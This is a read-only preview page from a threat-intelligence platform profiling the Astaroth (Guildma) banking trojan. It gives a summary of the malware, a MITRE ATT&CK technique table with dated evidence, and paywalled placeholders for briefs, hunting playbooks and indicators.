3C-INT logo [Cyber]Crime Characterization for Intelligence FREE PREVIEW
You are exploring the Free preview. To unlock full read-only access to all public profiles and in-app notifications, create a free research account. For analyst / premium plans capabilities (editing, advanced tabs, exports), please contact us

Threat Actor Characterization

Back
You’re viewing the read-only version. Sign in for analyst tools (editors, promote draft, file/relations management, etc.)
Astaroth

Astaroth

ID: 044a96fadc565be928d1a153f4f76ac625719
Crimeware Banking Malware Spyware/Stealer Trojan
Threat types: Malware, Cybercrime, Credential theft, Banking Fraud, Latin American
Unknown
Updated: 2026-02-26
Created: 2026-02-26
Progress: 67% Completeness: 66% Freshness: 70%
Operation zone:
Aliases Limited alias preview
Guildma
Actor Network Graph
Open Network Graph
Read-only preview for anonymous visitors. Sign in with a free Research account for full workspace.
MITRE ATT&CK®
confidence: medium-high
Actor Techniques page ATT&CK® Diagram

Astaroth (aka Guildma) is a long-running Latin American banking trojan ecosystem characterized by modular payloads, heavy obfuscation, and extensive living-off-the-land staging using native Windows tools and scripts. Public research describes resilient configuration and delivery pivots via legitimate platforms (cloud services, GitHub/YouTube), and recent government reporting (Jan 2026) describes a WhatsApp-based propagation evolution using ZIP/LNK/HTA/VBS/MSI lures. The malware monitors banking activity and uses credential theft (including keylogging and credential tools) to enable fraud. Defenders should prioritize script and LotL abuse detections, messaging attachment hygiene, and a dynamic IOC lifecycle due to high infrastructure churn.


Technique Technique name Tactics Evidence
T1566.001 Spearphishing Attachment TA0001
  • 2020-03-23 — Phishing-based delivery leading to multi-stage execution chain described. · ref
  • 2026-01-16 — Messaging/attachment delivery (ZIP/LNK/MSI/HTA/VBS) described for recent campaigns. · ref
T1204.002 Malicious File TA0002
  • 2026-01-16 — User execution of received archives/shortcuts/scripts is required to trigger the chain (described). · ref
T1059.005 Visual Basic TA0002
  • 2026-01-16 — Use of VBScript and HTA in staged delivery described. · ref
T1218.005 Mshta TA0005
  • 2020-03-23 — Abuse of mshta.exe and other signed binaries as part of living-off-the-land chain described. · ref
T1105 Ingress Tool Transfer TA0011
  • 2020-03-23 — Download of components using native tools (LotL) is part of the chain described. · ref
T1071.001 Web Protocols TA0011
  • 2026-01-16 — HTTP POST beaconing and C2 domain usage described in government alert. · ref
T1547.001 Registry Run Keys / Startup Folder TA0003 TA0004
  • 2026-01-16 — Run key persistence described as suspicious indicator in guidance. · ref
T1056.001 Keylogging TA0006 TA0009
  • 2026-01-16 — Keylogging and credential capture during banking site access described. · ref
T1027 Obfuscated Files or Information TA0005
  • 2020-05-11 — Obfuscation and anti-analysis techniques described by Talos. · ref
T1583.006 Web Services TA0042
  • 2025-10-10 — Use of third-party services such as ngrok for communications described (treat as infrastructure technique). · ref
T1583.001 Domains TA0042
  • 2024-02-20 — Abuse of cloud services (Cloud Run) for delivery described by Talos. · ref
Strategic Intelligence
Limited preview
Last updated: 2026-02-26T03:11:28+00:00

Astaroth (Guildma)

Classification: Unclassified / Open Source Intelligence (OSINT) — TLP:WHITE

Full strategic intelligence is available in Analyst and Premium plans.
Executive Analyst Brief for CISO
Saved Limited preview

Executive Analyst Brief for Decision Makers — Astaroth (Guildma)


Upgrade to access the full executive brief.
Tip: Hover the section title to learn what’s included in Analyst / Premium plans.
Executive brief now
Saved successfully.
Hunting Playbook
Saved Limited preview

Hunting Playbook — Astaroth (Guildma) (Phishing/IM → LotL Staging → Credential Theft)


Upgrade to access the full hunting playbook.
Tip: Hover the section title to learn what’s included in Analyst / Premium plans.
Hunting Playbook now
Saved successfully.
IOC Appendix
Saved Limited preview
Last updated: 2026-02-26T03:12:38+00:00

IOC Appendix — Astaroth (Guildma) (TLP:WHITE)


More IOC context for Research. Full appendix for Analyst and Premium plans.
IOC Appendix now
Saved successfully.
OSINT Library
Saved Limited preview
Last saved: 2026-02-26T03:17:21+00:00

OSINT Library — Astaroth (Guildma)


2026-01-16 — ECUCERT (Ecuador) — “Alerta AL-2026-002: Malware Astaroth (PDF)”

Full OSINT references available for Research / Analyst.
OSINT Library now
Saved successfully.
Social Medial & Communication
SOCMINT integrated: 0/0
No social links registered for this profile.
Notes: preview mode hides sensitive social/contact details.
Reference Images/Associated Evidence Limited
No images found for this threat.